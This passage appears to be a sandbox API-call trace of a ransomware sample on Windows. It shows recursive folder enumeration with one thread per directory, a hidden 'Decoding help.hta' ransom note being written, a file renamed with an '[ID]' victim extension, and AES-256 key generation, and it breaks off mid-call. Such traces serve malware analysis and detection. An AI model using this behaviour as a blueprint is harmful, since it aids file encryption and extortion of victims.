(lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.519] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Libraries" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries") returned="\\\\?\\C:\\Users\\Public\\Libraries" [0039.519] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" [0039.519] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107d8180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.527] CloseHandle (hObject=0x1e0) returned 1 [0039.528] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0039.528] lstrcmpW (lpString1=".", lpString2="Music") returned -1 [0039.528] lstrcmpW (lpString1="..", lpString2="Music") returned -1 [0039.528] lstrcmpiW (lpString1="windows", lpString2="Music") returned 1 [0039.529] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.529] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.529] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music") returned="\\\\?\\C:\\Users\\Public\\Music" [0039.529] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\*.*") returned="\\\\?\\C:\\Users\\Public\\Music\\*.*" [0039.529] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10808250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.538] CloseHandle (hObject=0x1e0) returned 1 [0039.538] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0039.538] lstrcmpW (lpString1=".", lpString2="Pictures") returned -1 [0039.538] lstrcmpW (lpString1="..", lpString2="Pictures") returned -1 [0039.539] lstrcmpiW (lpString1="windows", lpString2="Pictures") returned 1 [0039.543] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.543] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.543] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures" [0039.543] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\*.*" [0039.543] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10838320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.548] CloseHandle (hObject=0x1e0) returned 1 [0039.548] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0039.548] lstrcmpW (lpString1=".", lpString2="Recorded TV") returned -1 [0039.548] lstrcmpW (lpString1="..", lpString2="Recorded TV") returned -1 [0039.548] lstrcmpiW (lpString1="windows", lpString2="Recorded TV") returned 1 [0039.550] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.550] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.550] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Recorded TV" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV") returned="\\\\?\\C:\\Users\\Public\\Recorded TV" [0039.550] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*" [0039.550] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108683f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.556] CloseHandle (hObject=0x1e0) returned 1 [0039.556] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0039.556] lstrcmpW (lpString1=".", lpString2="Videos") returned -1 [0039.556] lstrcmpW (lpString1="..", lpString2="Videos") returned -1 [0039.556] lstrcmpiW (lpString1="windows", lpString2="Videos") returned 1 [0039.556] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\*.*") returned="\\\\?\\C:\\Users\\Public\\*.*" [0039.556] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\*.*") returned 23 [0039.556] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\", lpString2="Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos") returned="\\\\?\\C:\\Users\\Public\\Videos" [0039.556] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\*.*") returned="\\\\?\\C:\\Users\\Public\\Videos\\*.*" [0039.556] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0039.556] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c78320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.558] CloseHandle (hObject=0x1e0) returned 1 [0039.558] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0039.558] FindClose (in: hFindFile=0x5a5570 | out: hFindFile=0x5a5570) returned 1 Thread: id = 66 os_tid = 0xb3c [0039.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\*.*", lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.446] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.446] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.446] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.446] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0039.446] lstrcmpW (lpString1=".", lpString2="logs") returned -1 [0039.446] lstrcmpW (lpString1="..", lpString2="logs") returned -1 [0039.446] lstrcmpiW (lpString1="windows", lpString2="logs") returned 1 [0039.446] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Mozilla\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\*.*") returned="\\\\?\\C:\\ProgramData\\Mozilla\\*.*" [0039.446] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\*.*") returned 30 [0039.446] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\", lpString2="logs" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs") returned="\\\\?\\C:\\ProgramData\\Mozilla\\logs" [0039.446] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*") returned="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*.*" [0039.446] GlobalMemoryStatus (in: lpBuffer=0x714fd10 | out: lpBuffer=0x714fd10) [0039.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4280798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0039.470] CloseHandle (hObject=0x198) returned 1 [0039.470] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0039.470] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 67 os_tid = 0xb40 [0039.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*", lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5530 [0039.468] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.468] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.468] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.468] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.468] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5abe1b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5abe1b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Primary Interop Assemblies", cAlternateFileName="PRIMAR~1")) returned 1 [0039.468] lstrcmpW (lpString1=".", lpString2="Primary Interop Assemblies") returned -1 [0039.468] lstrcmpW (lpString1="..", lpString2="Primary Interop Assemblies") returned -1 [0039.468] lstrcmpiW (lpString1="windows", lpString2="Primary Interop Assemblies") returned 1 [0039.469] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*" [0039.469] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*") returned 44 [0039.470] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\", lpString2="Primary Interop Assemblies" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies" [0039.470] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" [0039.470] GlobalMemoryStatus (in: lpBuffer=0x728fd10 | out: lpBuffer=0x728fd10) [0039.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a7b068, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0039.496] CloseHandle (hObject=0x128) returned 1 [0039.496] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x9ea84660, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 1 [0039.496] lstrcmpW (lpString1=".", lpString2="RedistList") returned -1 [0039.496] lstrcmpW (lpString1="..", lpString2="RedistList") returned -1 [0039.496] lstrcmpiW (lpString1="windows", lpString2="RedistList") returned 1 [0039.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*" [0039.497] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*") returned 44 [0039.497] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\", lpString2="RedistList" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList" [0039.497] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*.*" [0039.498] GlobalMemoryStatus (in: lpBuffer=0x728fd10 | out: lpBuffer=0x728fd10) [0039.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9ac31a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0039.510] CloseHandle (hObject=0x128) returned 1 [0039.510] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x728fd30 | out: lpFindFileData=0x728fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x9ea84660, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 0 [0039.510] FindClose (in: hFindFile=0x5a5530 | out: hFindFile=0x5a5530) returned 1 Thread: id = 68 os_tid = 0xb44 [0039.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*", lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55b0 [0039.628] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.628] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.628] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.628] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.628] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0039.628] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0039.628] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0039.628] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0039.630] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*" [0039.630] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*") returned 45 [0039.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft" [0039.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\*.*" [0039.630] GlobalMemoryStatus (in: lpBuffer=0x73cfd10 | out: lpBuffer=0x73cfd10) [0039.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10958800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x190 [0039.640] CloseHandle (hObject=0x190) returned 1 [0039.640] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8362970, ftCreationTime.dwHighDateTime=0x1d4dde7, ftLastAccessTime.dwLowDateTime=0x8c8bb200, ftLastAccessTime.dwHighDateTime=0x1d4f2fd, ftLastWriteTime.dwLowDateTime=0x8c8bb200, ftLastWriteTime.dwHighDateTime=0x1d4f2fd, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sections.exe", cAlternateFileName="")) returned 1 [0039.640] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*" [0039.640] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*") returned 45 [0039.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Decoding help.hta" [0039.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\decoding help.hta")) returned 0xffffffff [0039.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0039.651] WriteFile (in: hFile=0x134, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x73cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x73cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.651] CloseHandle (hObject=0x134) returned 1 [0039.652] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.652] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sections.exe") returned -1 [0039.652] lstrlenW (lpString="sections.exe") returned 12 [0039.652] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*" [0039.652] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*") returned 45 [0039.652] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\", lpString2="sections.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe" [0039.652] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe" [0039.652] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe" (normalized: "c:\\program files\\reference assemblies\\sections.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\sections.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\sections.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\sections.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0039.653] CreateFileMappingA (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x184 [0039.653] CryptAcquireContextA (in: phProv=0x73cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x73cfcec*=0x5dc830) returned 1 [0039.654] CryptGenKey (in: hProv=0x5dc830, Algid=0x6610, dwFlags=0x1, phKey=0x73cfce8 | out: phKey=0x73cfce8*=0x5a5570) returned 1 [0039.654] CryptExportKey (in: hKey=0x5a5570, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x73cfbe4, pdwDataLen=0x73cfce4 